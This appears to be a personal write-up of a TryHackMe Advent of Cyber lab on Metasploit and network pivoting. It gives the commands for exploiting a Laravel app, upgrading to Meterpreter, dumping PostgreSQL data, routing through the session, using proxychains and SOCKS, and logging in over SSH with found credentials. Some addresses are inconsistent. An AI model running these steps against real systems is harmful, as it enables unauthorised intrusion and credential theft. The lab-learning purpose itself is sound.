Pivoting
THM- day 9 advent of cyber 4, 2022
Hey there hacker, Today I’m gonna walk you through pivoting tasks under day 9. Let’s begin!
Docker : if you see there exists a file : / .dockerenv at the root directory then one can tell that the application is running on docker.
This room is all about switching modules on a framework called Metasploit. Metasploit leverages initial access to the target system. The fun part : it’s free!
Starting with recon on the given machine with a basic nmap scan:
Finding Common exploits to laravel version 8
start metasploit by typing in “msfconsole” in the terminal.
set rhosts <machine-ip>
set lhost tun0/eth0
check
Run the exploit using “run” or “exploit”. If it doesn’t run, type in “set ForceExploit true”
After successfully exploiting the target ip you can get the user id of what you user you are. This shell here is an unstable shell, To get a stable shell we’d want something known as a meterpreter shell which is useful in many ways. You can start meterpreter session with the command on the current user:
sessions -u 1
and then run using:
sessions -i <session id of meterpreter>
Moving forward, let’s list down the root directories under this user.
The .env file inside /var/www is of our particular interest as it might contain the datab
exit from shell mode using “exit”.
Since we don’t know the ip_address of this db_host named webservice_database:
Now you can try commands like
ip a or ifconfig
to see the ip address of machine the docker container is inside.
But none of these work in this case, so we take the default “127.17.0.1”.
Let’s now search for the database exploits :
auxiliary/scanner/postgres/postgres_schemadump is the exploit you wanna use next.
Before we go ahead we need to modify metasploit’s internal routing table.
This routing table determines where to send network traffic through, for instance, through a Meterpreter session. This way, we are using Meterpreter to pivot: sending traffic through to other machines on the network.
route add <IP/subnet> <meterpreter-session-id>
Now let’s then use auxiliary/admin/postgres/postgres_readfile : PostgreSQL Server Generic Query .
Now this completes metasploit basics, here comes the main part “PIVOTING”.
SOCKS proxy server: start the socks proxy server- > A socks proxy is an intermediate server that supports relaying networking traffic between two machines.
Now you can send requests to the docker using socks proxy. Tools such as curl
support sending requests through a socks proxy server via the --proxy
flag:
curl --proxy socks5://127.0.0.1:1080 http://172.17.0.1
Now there’s a file named proxychains4.conf in /etc folder open that and edit the contents
Now, if the tool does not natively support an option for using a socks proxy, ProxyChains can intercept the tool’s request to open new network connections and route the request through a socks proxy instead.
proxychains curl http://127.17.0.1 //strict chain 127.0.0.1:1080 ... 172.17.0.1:80
That means we can access the docker app. Let’s run an nmap scan to see what ports are open :
proxychains nmap -F -sT -Pn 172.17.0.1
Let’s go back to metasploit and search for ssh.
run ssh://santa_username_here:santa_password_here@172.17.0.1
Gosh, that was a lot for a day, but we found out how to pivot through one application to another ;) using tools like socks proxy and proxychains.
There are other methods of pivoting as well, if this topic seems interesting, find what those might be!
Keep hackin!